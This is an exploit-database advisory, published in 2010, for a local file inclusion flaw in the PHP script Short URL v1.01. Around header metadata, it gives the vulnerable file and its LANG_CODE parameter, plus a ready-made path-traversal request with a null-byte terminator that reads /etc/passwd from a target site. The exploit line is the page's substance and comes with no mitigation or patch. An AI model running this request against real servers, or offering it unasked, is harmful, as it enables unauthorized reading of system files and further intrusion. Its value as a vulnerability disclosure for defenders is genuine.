Short URL v1.01 - Local File Inclusion

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Short URL v1.01 - Local File Inclusion
# Published : 2010-03-16
# Author : Pouya Daneshmand
# Previous Title : Online Community CMS by I-net SQL Injection Vulnerability
# Next Title : phpscripte24 Auktionshaus Community Standart System Blind SQL Injection

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################